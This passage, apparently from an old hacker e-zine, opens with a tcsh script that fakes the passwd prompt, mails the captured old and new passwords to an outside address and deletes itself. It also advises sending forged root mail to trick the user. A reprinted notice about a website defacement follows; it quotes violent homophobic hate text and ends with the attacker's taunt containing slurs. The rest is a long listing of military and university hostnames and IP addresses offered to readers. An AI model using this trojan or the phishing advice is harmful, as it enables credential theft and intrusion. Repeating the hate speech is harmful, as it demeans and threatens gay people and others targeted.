it, and alias "/bin/passwd" and "passwd" to run the hidden file.. Script 002 : ------------ #!/bin/tcsh echo -n "Changing password for $USER on ";hostname echo -n "Old password: " stty -echo echo $<>$HOME/.tym echo "" echo -n "New password: " echo $<>>$HOME/.tym echo "" stty echo mail me@my.anon.mail.service.org<$HOME/.tym rm $HOME/.tym echo "Error: Incorrect Password" rm -f $0 unalias /bin/passwd unalias passwd Now you may think "Why would the user want to change his/her password anytime soon?".. Well, to get them to change passwords you could send fakemail 'from' their root.. saying that the password file has been tampered with, and that they need to change passwords.. maybe even saying "please use at least one upper case letter, and a number", or something to make it sound real... Or if you could think of any other way to scare the user into changing it, that would also work... KC. ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 8. The Last Hack Of dk : taken from www.crackhouse.com ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ On October 31, 1996, a "computer hacker" gained access to the Internet server at the QCC and defaced our HomePage with vicious, hateful text and images. These actions are not only malicious, but clearly illegal. These actions are a clear form of "bashing" via the Internet and a serious hate crime. We have saved the defaced page for evidence. The contents can be summarized as a long string of "kill the faggots", "god hates fags", "AIDS KILLZ Faggots DEAD" and "fags are wrong, the bible says so. if you are gay or think you are, the QCC recommends suicide.". Existing images of the page were defaced with the word "Die Fags" and demeaning, derogatory images of women were added to the page. The intent of the message was violent and hateful, and a clear violation of California's anti-hate legislation. Hate crimes on the Internet are rare, but have occurred on other sites. The Gay & Lesbian Center is currently reviewing appropriate available actions with our Legal Services Department. The QCC server has been resecured, and a number of additional reconfigurations have been implemented to increase server security. Unfortunately, no system on the Internet is ever 100% safe from a dedicated hacker with malicious intention. The system is now being carefully monitored. Finally, we apologize to all of our users who were exposed to this defamation prior to its discovery and correction by the project's manager. We thank everyone who called and E-mailed to bring this to our attention. We will post further information as it become available. We continue to support each other in these new digital communities and will work with our allies, to prevent the transmission of old hatreds, ignorance, bigotry and inhumanity into this new cyber environment. This message from: The L.A. Gay & Lesbian Center A personal message from the QCC's project manager, John Waiblinger contrary to popular belief i don't hold an anti-gay stance, i was just merely busting some balls, by the way, tami from the real world used to work at the L.A. Gay & Lesbian Center, hugs tami!!, you dumb spic, by the way, "ignorance" ? last time i checked i wasn't the one who got hacked, break yo self QCC. -dk ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 9. Department of Defence Server Listing : The CodeZero crew ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6.1.0.1 yuma-emh1.army.mil yuma.arpa yuma1.army.mil 7.8.0.2 protolaba.dca.mil protolaba.arpa 7.0.0.3 edn-vax.dca.mil edn-vax.arpa 8.0.0.2 ccs.bbn.com 8.1.0.2 cci.bbn.com bbncci.arpa 8.3.0.2 ccd.bbn.com bbnccd.arpa 8.5.0.2 cck.bbn.com 8.0.0.5 cd2.bbn.com 8.2.0.5 cc1-tac.bbn.com 8.3.0.9 bbnnet2-arpanet-gw.arpa bbnnet2-arpanet-gw.bbn.com 8.7.0.9 egonoc.bbn.com 8.0.0.10 cc4-tac.bbn.com 8.3.0.10 jsnach.bbn.com jsnach.arpa 8.1.0.12 noc3.bbn.com 8.5.0.14 dev.cs.net 128.89.0.94 dev.cs.net 8.1.0.16 rvax.bbn.com 128.89.0.132 rvax.bbn.com 8.1.0.18 cc2.bbn.com 8.7.0.18 cca.bbn.com bbncca.arpa 8.6.0.19 cc3-tac.bbn.com 8.9.0.19 ccny.bbn.com 8.2.0.24 ccu.bbn.com bbnccu.arpa 8.3.0.24 cco.bbn.com 8.0.0.26 ccp.bbn.com 8.1.0.26 ccq.bbn.com bbnccq.arpa 8.3.0.26 hnoc.bbn.com 8.5.0.26 z.bbn.com bbnz.arpa 8.7.0.26 ccx.bbn.com bbnccx.arpa 8.8.0.26 ccy.bbn.com bbnccy.arpa 8.16.0.33 cce.bbn.com bbncce.arpa 8.1.0.35 col.bbn.com bbncc-columbia.arpa 8.2.0.37 cc-vm.bbn.com 8.0.0.58 idnoc.bbn.com 8.0.0.97 noc4.bbn.com 10.4.0.5 gw-1.cs.net 192.31.103.1 gw-1.cs.net 192.5.58.1 gw-1.cs.net 10.7.0.5 lpr-netman.arpa lpr-netman.bbn.com 10.2.0.7 rand-arpa-tac.arpa 10.2.0.11 su-arpa-tac.arpa 10.3.1.11 stanford.arpa 10.5.0.14 white.incsys.com incremental.arpa 192.31.230.1 white.incsys.com incremental.arpa 10.6.0.14 cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.edu 128.147.128.1 cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.edu 128.147.1.1 cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.edu 130.49.128.1 cadre.dsl.pitt.edu cadre.arpa cadre.dsl.pittsburgh.edu 10.8.0.14 gateway.sei.cmu.edu 128.237.254.254 gateway.sei.cmu.edu 128.2.237.251 gateway.sei.cmu.edu 10.4.0.17 tis.com tis.arpa 10.2.0.20 dcec-arpa-tac.arpa 10.3.0.20 edn-unix.dca.mil edn-unix.arpa 10.5.0.20 dcec-psat.arpa 10.11.0.20 sccgate.scc.com sccgate.arpa 10.1.21.27 mcon.isi.edu 10.0.21.22 mcon.isi.edu 10.1.22.27 speech11.isi.edu 10.1.23.27 wbc11.isi.edu isi-wbc11.arpa 10.0.23.22 wbc11.isi.edu isi-wbc11.arpa 10.1.89.27 setting.isi.edu isi-setting.arpa 10.1.91.27 pallas-athene.isi.edu isi-pallas-athene.arpa 10.1.97.27 aikane.isi.edu isi-aikane.arpa 10.1.98.27 czar.isi.edu isi-czar.arpa 10.1.99.27 mycroft.isi.edu isi-mycroftxxx.arpa 10.1.124.27 cmr.isi.edu isi-cmr.arpa 10.1.156.27 png11.isi.edu 10.1.254.27 echo.isi.edu isi-echo.arpa 10.0.0.28 arpa3-tac.arpa 10.1.0.31 amc.xait.xerox.com cca-vms.arpa 10.4.0.31 xait-arp-tac.arpa cca-arp-tac.arpa 10.0.0.46 collins-pr.arpa 10.1.0.46 collins-gw.arpa 192.12.172.11 collins-gw.arpa 10.7.0.51 a-lhi-sri-03.arpa 10.3.1.54 jpl-robotics.arpa 10.1.0.63 bbn-arpa-tac.arpa 10.2.0.77 mit-arpa-tac.arpa 10.3.0.77 umass-gw.cs.umass.edu unix1.cs.umass.edu 128.119.40.12 umass-gw.cs.umass.edu unix1.cs.umass.edu 10.0.0.82 tacac.arpa 10.1.0.82 a-lhi-bbn-01.arpa 10.5.0.82 arpa-mc.arpa arpanet-mc.arpa 10.5.0.96 prc-gw.prc.unisys.com 10.2.0.99 vax-x25.arpa 10.3.0.99 bbn-x25-test3.arpa 10.4.0.99 bbn-x25-test4.arpa 10.5.0.99 test-host5-x25.arpa 10.0.0.115 anoc1.arpa 10.0.0.126 tycho.ncsc.mil tycho.arpa 10.1.0.126 afterlife.ncsc.mil afterlife.arpa 13.2.16.8 parcvax.xerox.com vaxc.xerox.com 13.1.100.206 arisia.xerox.com 13.0.12.232 xerox.com xerox.arpa 14.0.0.4 vtest.cs.ucl.ac.uk ucl-vtest.arpa 14.0.0.5 ess-tun.cs.ucl.ac.uk 14.0.0.9 tunnel.cs.ucl.ac.uk 15.255.152.2 sde.hp.com 15.255.16.7 hplabs.hp.com hplabs.arpa 16.1.0.1 decwrl.dec.com wrl.dec.com 16.10.0.1 vixie.sf.ca.us 16.1.0.2 gatekeeper.dec.com 16.1.0.3 cerberus.pa.dec.com 16.1.0.8 src.dec.com decsrc.dec.com 16.1.0.9 wsl.dec.com 18.72.2.1 mit.edu 18.77.0.2 mitlns.mit.edu 18.85.0.2 media-lab.media.mit.edu 18.87.0.2 euler.mit.edu 18.92.0.2 coventry.mit.edu 18.72.0.3 bitsy.mit.edu 18.79.0.3 lids.mit.edu 18.85.0.3 atrp.media.mit.edu 18.87.0.3 cauchy.mit.edu 18.92.0.3 mitvma.mit.edu 18.71.0.4 orpheus.mit.edu 18.86.0.4 xv.mit.edu 18.87.0.4 abel.mit.edu 18.79.0.5 lmpvax.mit.edu 18.86.0.5 dolphin.mit.edu 18.87.0.5 stokes.mit.edu 18.10.0.6 sludge.lcs.mit.edu mit-sludge.arpa 18.26.0.134 sludge.lcs.mit.edu mit-sludge.arpa 128.127.25.101 sludge.lcs.mit.edu mit-sludge.arpa 18.62.0.6 eddie.mit.edu mit-eddie.mit.edu 18.72.0.6 priam.mit.edu 18.85.0.6 ems.media.mit.edu 18.86.0.6 sloan.mit.edu 18.87.0.6 banach.mit.edu 18.71.0.7 jason.mit.edu 18.87.0.7 fermat.mit.edu 18.72.0.8 achilles.mit.edu 18.87.0.8 bourbaki.mit.edu math.mit.edu 18.10.0.9 gross.ai.mit.edu mit-gross.arpa 128.52.22.9 gross.ai.mit.edu mit-gross.arpa 128.52.14.1 gross.ai.mit.edu mit-gross.arpa 128.52.32.1 gross.ai.mit.edu mit-gross.arpa 18.87.0.9 archimedes.mit.edu 18.75.0.10 space.mit.edu 18.87.0.10 fourier.mit.edu 18.87.0.11 newton.mit.edu 18.71.0.12 paris.mit.edu 18.87.0.12 noether.mit.edu 18.80.0.13 charon.mit.edu 18.87.0.13 zermelo.mit.edu 18.72.1.14 eagle.mit.edu 18.80.0.14 prometheus.mit.edu 18.87.0.14 borel.mit.edu 18.87.0.15 poisson.mit.edu 18.87.0.16 schubert.mit.edu 18.62.0.17 dspvax.mit.edu mit-bugs-bunny.arpa 18.80.0.17 bloom-beacon.mit.edu 18.87.0.17 boole.mit.edu 18.27.0.18 fft.mit.edu 18.87.0.18 galois.mit.edu 18.27.0.19 dft.mit.edu 18.87.0.19 laplace.mit.edu 18.27.0.20 porky.mit.edu 18.87.0.20 ramanujan.mit.edu 18.92.0.20 po.mit.edu 18.27.0.21 sam.mit.edu 18.87.0.21 turing.mit.edu 18.87.0.22 russell.mit.edu 18.87.0.23 hypatia.mit.edu emma.mit.edu 18.87.0.24 laurent.mit.edu 18.87.0.25 bessel.mit.edu 18.87.0.26 cantor.mit.edu 18.87.0.27 fibonacci.mit.edu 18.87.0.28 lebesgue.mit.edu 18.87.0.29 pythagoras.mit.edu 18.85.0.30 hq.media.mit.edu 18.87.0.30 von-neumann.mit.edu 18.87.0.31 polya.mit.edu 18.87.0.32 pascal.mit.edu 18.87.0.33 euclid.mit.edu 18.87.0.34 bernoulli.mit.edu 18.30.0.35 cls.lcs.mit.edu mit-cls.arpa 18.87.0.35 hausdorff.mit.edu 18.26.0.36 xx.lcs.mit.edu lcs.mit.edu mit-xx.arpa 18.87.0.36 dedekind.mit.edu 18.87.0.37 jacobi.mit.edu 18.71.0.38 prep.ai.mit.edu 18.87.0.38 hermite.mit.edu 18.72.0.39 athena.mit.edu mit-athena.arpa 18.87.0.39 tarski.mit.edu 18.87.0.40 markov.mit.edu 18.87.0.41 godel.mit.edu goedel.mit.edu 18.88.0.55 cogito.mit.edu 18.27.0.56 goldilocks.lcs.mit.edu mit-goldilocks.arpa 18.10.0.71 pm-prj.lcs.mit.edu mit-prj.arpa 18.26.0.80 melange.lcs.mit.edu grape-nehi.lcs.mit.edu 18.88.0.80 hstbme.mit.edu 18.88.0.82 infoods.mit.edu 18.88.0.85 psyche.mit.edu 18.52.0.92 theory.lcs.mit.edu mit-theory.arpa 18.88.0.92 erl.mit.edu 18.26.0.94 thyme.lcs.mit.edu jhereg.lcs.mit.edu toadkiller-dog.lcs.mit.edu 18.26.0.95 larch.lcs.mit.edu mit-larch.arpa 18.26.0.98 rinso.lcs.mit.edu mit-rinso.arpa 18.26.0.106 tide.lcs.mit.edu mit-tide.arpa mit-tide tide 18.26.0.107 dash.lcs.mit.edu mit-dash.arpa mit-dash dash 18.26.0.114 hq.lcs.mit.edu 18.82.0.114 mgm.mit.edu 18.26.0.115 allspice.lcs.mit.edu ptt.lcs.mit.edu 18.26.0.121 lithium.lcs.mit.edu 18.72.0.122 ra.mit.edu 18.72.0.142 arktouros.mit.edu 18.71.0.151 mit-strawb.arpa strawb.mit.edu 18.70.0.160 w20ns.mit.edu 18.26.0.176 zurich.ai.mit.edu 18.80.0.181 osborn.mit.edu 18.80.0.191 delphi.mit.edu 18.30.0.192 vx.lcs.mit.edu mit-vax.arpa mit-vx.arpa mit-vax.lcs.mit.edu 18.10.0.195 big-blue.lcs.mit.edu mit-big-blue.arpa 18.48.0.195 live-oak.lcs.mit.edu oak.lcs.mit.edu 18.72.0.205 garp.mit.edu 18.30.0.206 zermatt.lcs.mit.edu 18.30.0.212 expo.lcs.mit.edu 18.48.0.216 wild-blue-yonder.lcs.mit.edu wild-blue.lcs.mit.edu 18.86.0.216 diamond.mit.edu 18.62.0.232 caf.mit.edu mit-caf.arpa 26.1.0.1 oberursel.mt.ddn.mil oberursel-mil-tac.arpa 26.3.0.1 rhe-eds.af.mil rhe-eds.arpa 26.5.0.1 obl-ignet.army.mil obe-ignet.arpa 26.6.0.1 pcc-obersl.army.mil 26.7.0.1 oberursel-emh1.army.mil email-oberursl.army.mil 26.0.0.2 emmc.dca.mil eur-milnet-mc.arpa 26.1.0.2 patch.mt.ddn.mil minet-vhn-mil-tac.arpa 26.3.0.2 eur.dca.mil dca-eur.arpa dca-eur.dca.mil 26.4.0.2 moehringen-emh1.army.mil 26.5.0.2 moehringen-ignet.army.mil igmirs-moehringer.arpa 26.6.0.2 patch.dca.mil patch.arpa 26.8.0.2 goeppingen-emh1.army.mil email-goeppngn.army.mil 26.9.0.2 nellingen-emh1.army.mil email-nellingn.army.mil 26.10.0.2 pcc-moeh.arpa moeh-pcc.army.mil 26.11.0.2 pcc-nell.arpa nel-pcc.army.mil 26.12.0.2 pcc-boeb.arpa bbl-pcc.army.mil 26.13.0.2 pcc-vaih.arpa vhn-pcc.army.mil 26.14.0.2 patch2.mt.ddn.mil vaihingen2-mil-tac.arpa 26.15.0.2 frg.bbn.com bbncc-eur.arpa 26.16.0.2 erf-boe.arpa bbl-erf.army.mil 26.0.0.3 sandiego.mt.ddn.mil sandiego-tac.arpa 26.1.0.3 trout.nosc.mil nosc.mil trout.nosc.navy.mil 128.49.16.7 trout.nosc.mil nosc.mil trout.nosc.navy.mil 26.2.0.3 logicon.arpa 26.3.0.3 nprdc.navy.mil nprdc.arpa nprdc.mil 192.5.65.1 nprdc.navy.mil nprdc.arpa nprdc.mil 26.4.0.3 mcdn-cpt.arpa 26.5.0.3 sdcsvax.ucsd.edu 128.54.20.1 sdcsvax.ucsd.edu 26.6.0.3 navelex.arpa 26.7.0.3 navelexnet-sd.arpa 26.8.0.3 sds-sandgoa.arpa sds-sandgoa.navy.mil 26.9.0.3 mirnas.arpa 26.11.0.3 navmeducapendleton.arpa 26.12.0.3 sssd.arpa 26.13.0.3 navmeducasandiego.arpa 26.14.0.3 sandiego-httds.arpa 26.15.0.3 scubed.com scubed.arpa scubed.scubed.com 192.31.63.10 scubed.com scubed.arpa scubed.scubed.com 192.16.16.70 scubed.com scubed.arpa scubed.scubed.com 26.16.0.3 grunion.nosc.mil nosc-ether.arpagrunion.nosc.navy.mil 192.42.2.2 grunion.nosc.mil nosc-ether.arpagrunion.nosc.navy.mil 26.18.0.3 comnavsurfpac.arpa 26.0.0.4 zwe-eds.af.mil zwe-eds.arpa 26.1.0.4 campbell-bks.mt.ddn.mil campbllbks-mil-tac.arpa 26.2.0.4 heidelberg-emh1.army.mil heidelberg-emh.arpa 26.4.0.4 heidelberg-perddims.army.mil perddims-hei.arpa 26.5.0.4 edas-scw.arpa szn-edasscw.army.mil 26.6.0.4 cpo-man-eur.arpa mhn-cpo.army.mil 26.7.0.4 hdg-ignet1.army.mil hhsp-ignet.arpa 26.8.0.4 hdg-ignet2.army.mil hei2-ignet.arpa 26.9.0.4 jacs6333.army.mil 26.14.0.4 pcc1.arpa hdg-pcc.army.mil 26.15.0.4 ccpd.arpa hdg-ccpd.army.mil 26.16.0.4 cpo-hdl-eur.arpa hdg-cpo.army.mil 26.1.0.5 karl-shurz.mt.ddn.mil bremerhaven-mil-tac.arpa 26.4.0.5 pals-68.arpa brn-pals1.army.mil 26.5.0.5 pals-67.arpa brn-pals.army.mil 26.6.0.5 oldendorf-am1.af.mil 26.7.0.5 bremrhvn-meprs.army.mil 26.8.0.5 bremerhave-emh1.army.mil email-klshzksn.army.mil 26.10.0.5 bremerhave-asims.army.mil brm-asims.arpa 26.11.0.5 dasps-e-562-b.arpa obl-daspseb.army.mil 26.12.0.5 gst-ignet.army.mil gar-ignet.arpa 26.13.0.5 mtmc-aif-b.arpa brn-aifb.army.mil 26.0.0.6 rotterdam.mt.ddn.mil minet-rdm-mil-tac.arpa 26.5.0.6 sostrbrg-piv.af.mil 26.6.0.6 cna-eds.af.mil cna-eds.arpa 26.7.0.6 schinnen-emh1.army.mil 26.9.0.6 rotterdam-emh1.army.mil email-rotterdm.army.mil 26.10.0.6 mtmc-aif.arpa rotterdam-aif.army.mil 26.11.0.6 dasps-e-778.arpa rotterdam-daspse.army.mil 26.13.0.6 mtf-sosbg.af.mil mtf-sosbg.arpa mtf-cp-newamsterdam.arpa 26.1.0.7 london.mt.ddn.mil minet-lon-mil-tac.arpa 26.4.0.7 ben-eds.af.mil ben-eds.arpa 26.6.0.7 chievres-emh1.army.mil 26.10.0.7 alc-eds.af.mil alc-eds.arpa 26.11.0.7 kem-eds.af.mil kem-eds.arpa 26.12.0.7 london-ncpds.arpa 26.0.0.8 washdc-nrl.mt.ddn.mil nrlwashdc-mil-tac.arpa 26.3.0.8 ccf.nrl.navy.mil ccf3.nrl.navy.mil nrl.arpa nrl3.arpa 128.60.0.3 ccf.nrl.navy.mil ccf3.nrl.navy.mil nrl.arpa nrl3.arpa 26.5.0.8 nardacwash-001.arpa 26.7.0.8 spawar-003.arpa 26.8.0.8 sds-cda1.arpa sds-cda1.navy.mil 26.9.0.8 navelexnet-ward.arpa 26.10.0.8 ships-donoacs.arpa 26.11.0.8 wnyosi2.arpa 26.11.2.8 wnysamis.arpa 26.11.3.8 wnyosi4.arpa 26.11.4.8 wnyosi7.arpa 26.13.0.8 amdahl-5850-vm.navy.mil 26.15.0.8 amdahl-v7a.navy.mil 26.16.0.8 amdahl-v7.navy.mil 26.17.0.8 ibm4381.navy.mil 26.20.0.8 nfe.nrl.navy.mil nrl-nfe.arpa 128.60.1.1 nfe.nrl.navy.mil nrl-nfe.arpa 192.26.26.1 nfe.nrl.navy.mil nrl-nfe.arpa 26.21.0.8 arctan.nrl.navy.mil nrl-arctan.arpa 26.1.0.9 sigonella.mt.ddn.mil sigonella-mil-tac.arpa 26.3.0.9 com-eds.af.mil com-eds.arpa 26.4.0.9 san-eds.af.mil san-eds.arpa 26.6.0.9 sig-ncpds.arpa 26.7.0.9 mtf-comiso.af.mil 26.8.0.9 comiso-am1.af.mil comiso-am1.arpa 26.10.0.9 comiso-piv.af.mil 26.1.0.10 rota.mt.ddn.mil rota-mil-tac.arpa 26.2.0.10 mtf-rota.arpa mtf-rota.af.mil 26.6.0.10 rota-ncpds.arpa 26.0.0.11 corona.mt.ddn.mil corona-mil-tac.arpa 26.4.0.11 fltac-poe.arpa 26.6.0.11 santaana-dmins.dla.mil 26.7.0.11 c.navy.mil dgoa.arpa 26.8.0.11 fltac-sperry.arpa 26.9.0.11 norton-ro1.af.mil norton-ro1.arpa 26.10.0.11 afsc-bsd.af.mil afsc-bmo.af.mil afsc-bmo.arpa 26.12.0.11 norton-piv-2.af.mil norton-piv-2.arpa 26.13.0.11 afisc-01.af.mil afisc-01.arpa 26.15.0.11 corona-po.arpa 192.31.174.2 corona-po.arpa 26.0.0.12 vicenza.mt.ddn.mil vicenza-mil-tac.arpa 26.4.0.12 vca-asims.arpa vic-asims.army.mil 26.5.0.12 cpo-vic-eur.arpa vic-cpo.army.mil 26.6.0.12 afrts-vic.arpa vic-afrts.army.mil 26.7.0.12 vic-ignet.army.mil vic-ignet.arpa 26.8.0.12 emed-vicenza.arpa vic-emed.army.mil 26.9.0.12 meprs-vicenza.arpa vic-meprs.army.mil 26.10.0.12 jacs6335.arpa vic-hacs.army.mil 26.11.0.12 pcc-vice.arpa vic-pcc.army.mil 26.12.0.12 vicenza-emh1.army.mil email-vicenza.army.mil 26.0.0.13 gunter.mt.ddn.mil gunter-mil-tac.arpa 26.1.0.13 gunter-adam.af.mil gunter-adam.arpa 26.5.0.13 gunterp4.af.mil gunterp4.arpa 131.2.16.1 gunterp4.af.mil gunterp4.arpa 26.6.0.13 rucker-perddims.army.mil perddims06.arpa 26.7.0.13 bcgunt.af.mil bcgunt.arpa 26.11.0.13 jackson-perddims.army.mil perddims07.arpa 26.12.0.13 hrc-iris.af.mil hrc-iris.arpa 129.141.11.1 hrc-iris.af.mil hrc-iris.arpa 26.13.0.13 mtf-gunter.af.mil mtf-gunter.arpa 26.14.0.13 gu-eds.af.mil gu-eds.arpa 26.15.0.13 camnet-maxwell-r01.af.mil camnet-maxwell-r01.arpa 26.18.0.13 maxwell-am1.af.mil maxwell-am1.arpa camnet-maxw-r03.arpa 26.5.0.14 zweibrucke-asims.army.mil asims-zweibrucken.arpa 26.8.0.14 dmaoe.dma.mil dmaodsdoe.arpa 26.13.0.14 cpo-prm-eur.arpa pms-cpo.army.mil 26.14.0.14 cpo-zwi-eur.arpa zbn-cpo.army.mil 26.1.0.15 ramstein.mt.ddn.mil ramstein-mil-tac.arpa 26.5.0.15 van-eds.af.mil van-eds.arpa 26.8.0.15 camnettwo-ramstein.af.mil camnettwo-ramstein.arpa 26.9.0.15 camnet-ramstein.af.mil camnet-ramstein.arpa 26.16.0.15 erf-nah.arpa zbn-erfnah.army.mil 26.0.0.16 moffett.mt.ddn.mil moffett-mil-tac.arpa 26.1.0.16 arc-psn.arc.nasa.gov 26.2.0.16 amelia.nas.nasa.gov ames-nas.arpa ames-nas.nas.nasa.gov 129.99.20.1 amelia.nas.nasa.gov ames-nas.arpa ames-nas.nas.nasa.gov 26.3.0.16 nas-psn.nas.nasa.gov ames-nasb.arpa 10.1.0.8 nas-psn.nas.nasa.gov ames-nasb.arpa 128.102.32.5 nas-psn.nas.nasa.gov ames-nasb.arpa 26.4.0.16 mofnaf.navy.mil mofnaf.arpa 26.13.0.128 mofnaf.navy.mil mofnaf.arpa 26.6.0.16 sac-misc6.af.mil sac-misc6.arpa 26.8.0.16 gtewd.af.mil gtewd.arpa 26.0.0.17 mclean2.mt.ddn.mil mclean2-mil-tac.arpa 26.2.0.17 mclean.mt.ddn.mil mitre-mil-tac.arpa 26.3.0.17 mitre.arpa mwunix.mitre.org 128.29.104.0 mitre.arpa mwunix.mitre.org 26.6.0.17 his-fsd6.arpa 26.7.0.17 his-fsd8.arpa 26.10.0.17 ncpds-arlington.arpa 26.11.0.17 ddn-wms.arpa ddn-wms.dca.mil 26.12.0.17 fstc-chville.arpa 26.13.0.17 mclean-unisys.army.mil 26.14.0.17 cnrc.arpa 26.15.0.17 sysr-7cg.af.mil sysr-7cg.arpa sysr-7cg-ddn.arpa 26.16.0.17 dulles-ignet.army.mil ignet-prc.arpa 26.18.0.17 osi-2-gw.dca.mil 26.17.0.17 osi-2-gw.dca.mil 26.19.0.17 beast.ddn.mil 192.33.3.2 beast.ddn.mil 26.0.0.18 multics.radc.af.mil radc-multics.arpa 26.1.0.18 drum-perddims.army.mil perddims27.arpa 26.2.0.18 griffiss.mt.ddn.mil radc-mil-tac.arpa 26.5.0.18 lonex.radc.af.mil radc-lonex.arpa 26.8.0.18 lons.radc.af.mil 26.9.0.18 coins.cs.umass.edu cs-umass.edu 26.10.0.18 softvax.radc.af.mil radc-softvax.arpa 26.12.0.18 sutcase.af.mil sutcase.arpa 26.13.0.18 ftdrum-meprs.army.mil 26.14.0.18 griffiss-piv-1.af.mil 26.17.0.18 electra.cs.buffalo.edu buffalo-cs.arpa 128.205.34.9 electra.cs.buffalo.edu buffalo-cs.arpa 26.18.0.18 cs.rit.edu rit.arpa 26.24.0.18 mtf-plattsburgh.af.mil 26.27.0.18 ftdrum-ignet.army.mil 26.28.0.18 drum-tcaccis.army.mil 26.0.0.19 eagle.nist.gov nbs-vms.arpa nist.nbs.gov 26.3.0.20 oo1.af.mil oo1.arpa 26.4.0.20 hillmdss.af.mil hillmdss.arpa 26.5.0.20 hill.mt.ddn.mil hill1-mil-tac.arpa 26.6.0.20 hill-piv-1.af.mil 26.7.0.20 remis-oo.af.mil 26.8.0.20 edcars-oo.af.mil edcars-oo.arpa 26.9.0.20 dsacs10.arpa 26.10.0.20 oodis01.af.mil oodis01.arpa 192.12.100.3 oodis01.af.mil oodis01.arpa 26.11.0.20 aflc-oo-aisg1.af.mil aflc-oo-aisg1.arpa 26.12.0.20 mt-home-piv-1.af.mil mt-home-piv-1.arpa 26.13.0.20 mednet-oo.af.mil mednet-oo.arpa 26.16.0.20 ogden-dmins.dla.mil 26.19.0.20 snag-oo.af.mil snag-oo.arpa 26.4.0.21 sm-eds.af.mil sm-eds.arpa 26.5.0.21 oaknsc.navy.mil oaknsc.arpa 26.7.0.148 oaknsc.navy.mil oaknsc.arpa 26.7.0.21 oms-nws.navy.mil 26.0.0.22 mcclellan.mt.ddn.mil mcclellan-mil-tac.arpa 26.5.0.22 mcclelln-am1.af.mil mcclelln-am1.arpa 26.6.0.22 c3po.af.mil sm-alc-c3po.arpa 131.105.1.1 c3po.af.mil sm-alc-c3po.arpa 26.7.0.22 aflc-sm-dmmis1-si01.af.mil aflc-sm-dmmis1-si01.arpa 26.8.0.22 smdis01.af.mil rdb-sm.arpa 26.9.0.22 edcars-mcclellan.af.mil edcars-mcclellan.arpa 26.11.0.22 travis-piv-2.af.mil travis-piv-2.arpa 26.13.0.22 lewis-perddims.army.mil perddims20.arpa 26.18.0.22 beale-piv-1.af.mil 26.24.0.22 snag-sm.af.mil snag-sm.arpa 26.0.0.23 mcclellan2.mt.ddn.mil mcclellan2-mil-tac.arpa 26.4.0.23 sm1.af.mil sm1.arpa 26.5.0.23 mcclellan-mdss.af.mil mcclellan-mdss.arpa 26.6.0.23 aflc-sm-aisg1.af.mil aflc-sm-aisg1.arpa 26.8.0.23 netpmsa-bangor1.dca.mil netpmsa-bangor1.arpa terpss-ttf2.arpa 26.10.0.23 remis-sm.af.mil 26.12.0.23 mednet-sm.af.mil mednet-sm.arpa 26.0.0.24 nadc.arpa 26.1.0.24 dcrp.dla.mil dcrp.arpa 26.11.0.24 dcrp.dla.mil dcrp.arpa 26.3.0.24 johnsville.mt.ddn.mil johnsville-tac.arpa 26.5.0.24 ncpds-phili1.navy.mil ncpds-phili1.arpa 26.6.0.24 ncpds-phili2.navy.mil ncpds-phili2.arpa 26.7.0.24 dmadp.dma.mil dmaodsdcp.arpa 26.8.0.24 disc.arpa 26.9.0.24 dpsc.dla.mil dpsc.arpa 26.12.0.24 navmeducaphil.arpa 26.13.0.24 pera-crudes.navy.mil pera-crudes.arpa 26.14.0.24 burroughs-dev-2.dca.mil burroughs-dev-2.arpa 26.15.0.24 burroughs-dev-1.dca.mil burroughs-dev-1.arpa 26.19.0.24 philashpyd-poe.navy.mil philashpyd-poe.arpa 26.24.0.24 ccsu.arpa 26.2.0.25 mil-eds.af.mil mil-eds.arpa 26.3.0.25 croughton.mt.ddn.mil croughton-mil-tac.arpa 26.5.0.25 gre-eds.af.mil gre-eds.arpa 26.7.0.25 blnhmcsc-am1.af.mil 26.8.0.25 alconbry-piv-2.af.mil 26.9.0.25 mtf-upperheyford.af.mil mtf-upperheyford.arpa 26.11.0.25 upp-eds.af.mil upp-eds.arpa 26.12.0.25 fairford-am1.af.mil 26.14.0.25 mtf-ltlrsgtn.af.mil 26.15.0.25 mtf-fairford.af.mil mtf-fairford.arpa 26.16.0.25 mtf-grnhmcmn.af.mil 26.0.0.26 pentagon.mt.ddn.mil pentagon-mil-tac.arpa 26.1.0.26 pentagon-ignet.army.mil igmirs-daig.army.mil igmirs-daig.arpa 26.2.0.26 haflee.af.mil haflee.arpa 26.4.0.26 pentagon-opti.army.mil optimis-pent.arpa pentagon-emh1.army.mil 26.5.0.26 pent-gw-hq.af.mil 26.5.10.26 aad-hq.af.mil 26.5.27.26 hq.af.mil 26.5.70.26 vm7cg.af.mil vm7cg.arpa 26.6.0.26 msddnpent.af.mil msddnpent.arpa 26.7.0.26 coan.af.mil coan.arpa 26.8.0.26 fms2.af.mil fms2.arpa 26.12.0.26 navelexnet-crystal.arpa 26.13.0.26 nardac-nohims.arpa 26.24.0.26 opsnet-pentagon.af.mil opsnet-pentagon.arpa 26.1.0.27 holy-loch.mt.ddn.mil minet-hlh-mil-tac.arpa 26.4.0.27 oslo-am1.af.mil 26.6.0.27 menwithhill-am1.af.mil 26.8.0.27 dmris-keflavik.arpa 26.1.0.28 elmendorf.mt.ddn.mil elmendorf-mil-tac.arpa 26.2.0.28 ftrichardson-ignet.army.mil 